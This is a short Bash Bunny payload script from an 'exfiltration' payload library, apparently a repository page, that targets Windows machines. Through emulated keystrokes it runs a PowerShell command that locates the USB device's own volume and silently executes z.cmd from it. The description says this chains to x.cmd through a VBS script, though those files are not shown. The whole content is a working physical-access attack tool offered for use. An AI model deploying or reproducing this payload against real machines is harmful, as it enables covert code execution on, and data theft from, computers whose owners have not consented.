Files
bashbunny-payloads/payloads/library/exfiltration/simple-usb-extractor/payload.txt

19 lines
471 B
Bash

#!/bin/bash
#
# Title: simple-usb-extractor
# Version: 1.0
# Author: danthegoodman1
# Targets: Windows
# Attack Modes: HID, STORAGE
# Description: Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs
#
# LEDS:
# Yellow Blink - Attacking
# Green - Finished
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\z.cmd')"
LED FINISH